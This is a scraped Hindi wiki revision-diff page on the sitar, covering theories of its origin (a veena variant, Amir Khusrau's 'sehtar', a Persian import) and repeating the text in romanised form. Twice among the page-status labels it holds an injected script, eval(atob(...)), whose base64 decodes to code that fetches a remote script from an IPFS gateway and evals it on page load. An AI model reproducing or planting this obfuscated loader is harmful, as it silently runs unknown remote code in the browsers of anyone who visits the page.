Difference between revisions of "सितार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्व" to "महत्त्व")
m
Line 1: Line 1:
 
[[चित्र:Sitar.jpg|thumb|250px|सितार <br /> Sitar]]
 
[[चित्र:Sitar.jpg|thumb|250px|सितार <br /> Sitar]]
*सितार के जन्म के विषय में विद्वानों के अनेक मत हैं। अभी तक किसी भी मत के पक्ष में कोई ठोस प्रमाण नहीं प्राप्त हो सका हैं। कुछ विद्वानों के मतानुसार इसका निर्माण वीणा के एक प्रकार के आधार पर हुआ है। भारतीयता को महत्त्व देने वाले भारतीय विद्वान इस मत को सहज में ही मान लेते हैं।  
+
*सितार के जन्म के विषय में विद्वानों के अनेक मत हैं। अभी तक किसी भी मत के पक्ष में कोई ठोस प्रमाण नहीं प्राप्त हो सका हैं। कुछ विद्वानों के मतानुसार इसका निर्माण [[वीणा]] के एक प्रकार के आधार पर हुआ है। भारतीयता को महत्त्व देने वाले भारतीय विद्वान इस मत को सहज में ही मान लेते हैं।  
 
*दूसरे मतानुसार इसका आविष्कार 14वीं शताब्दी में [[अलाउद्दीन ख़िलजी]] के दरबारी हजरत [[अमीर ख़ुसरो]] ने मध्यमादि वीणा पर 3 तार चढ़ाकर सितार को जन्म दिया। उस समय उसका नाम '''सहतार''' रखा गया । फ़ारसी में 'सह' का अर्थ 3 होता हैं। धीरे-धीरे सहतार बिगड़ते-बिगड़ते सितार हो गया और 3 तार के स्थान पर 7 तार अथवा 8 तार लगाये जाने लगे।  
 
*दूसरे मतानुसार इसका आविष्कार 14वीं शताब्दी में [[अलाउद्दीन ख़िलजी]] के दरबारी हजरत [[अमीर ख़ुसरो]] ने मध्यमादि वीणा पर 3 तार चढ़ाकर सितार को जन्म दिया। उस समय उसका नाम '''सहतार''' रखा गया । फ़ारसी में 'सह' का अर्थ 3 होता हैं। धीरे-धीरे सहतार बिगड़ते-बिगड़ते सितार हो गया और 3 तार के स्थान पर 7 तार अथवा 8 तार लगाये जाने लगे।  
 
*तीसरे मतानुसार सितार पूर्णतया अभारतीय वाद्य है। यह वाद्य परशिया से [[भारत]] में आया। एक तारा, दो तारा, सहतारा, चहरतारा, पचतारा क्रमश: 1, 2, 3, 4 अथवा 5 तार वाले वाद्य आज भी परशिया के लोक-संगीत में व्यवह्रत हैं। सम्भव है कि इस वाद्य के प्रचार में अमीर ख़ुसरो का विशेष हाथ रहा हो।
 
*तीसरे मतानुसार सितार पूर्णतया अभारतीय वाद्य है। यह वाद्य परशिया से [[भारत]] में आया। एक तारा, दो तारा, सहतारा, चहरतारा, पचतारा क्रमश: 1, 2, 3, 4 अथवा 5 तार वाले वाद्य आज भी परशिया के लोक-संगीत में व्यवह्रत हैं। सम्भव है कि इस वाद्य के प्रचार में अमीर ख़ुसरो का विशेष हाथ रहा हो।

Revision as of 07:20, 25 May 2011

thumb|250px|sitar
Sitar

  • sitar ke janm ke vishay mean vidvanoan ke anek mat haian. abhi tak kisi bhi mat ke paksh mean koee thos praman nahian prapt ho saka haian. kuchh vidvanoan ke matanusar isaka nirman vina ke ek prakar ke adhar par hua hai. bharatiyata ko mahattv dene vale bharatiy vidvan is mat ko sahaj mean hi man lete haian.
  • doosare matanusar isaka avishkar 14vian shatabdi mean alauddin khilaji ke darabari hajarat amir khusaro ne madhyamadi vina par 3 tar chadhakar sitar ko janm diya. us samay usaka nam sahatar rakha gaya . farasi mean 'sah' ka arth 3 hota haian. dhire-dhire sahatar big date-big date sitar ho gaya aur 3 tar ke sthan par 7 tar athava 8 tar lagaye jane lage.
  • tisare matanusar sitar poornataya abharatiy vady hai. yah vady parashiya se bharat mean aya. ek tara, do tara, sahatara, chaharatara, pachatara kramash: 1, 2, 3, 4 athava 5 tar vale vady aj bhi parashiya ke lok-sangit mean vyavahrat haian. sambhav hai ki is vady ke prachar mean amir khusaro ka vishesh hath raha ho.
  • sitar paranparik vady hone ke sath hi sabase adhik lokapriy hai aur sitar aisa vady yantr hai jisane poori duniya mean hindustan ka nam lokapriy kiya.
  • sitar bahuayami saj hone ke sath hi ek aisa vady yantr hai jisake zariye bhavanaoan ko prakat kiya jata haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh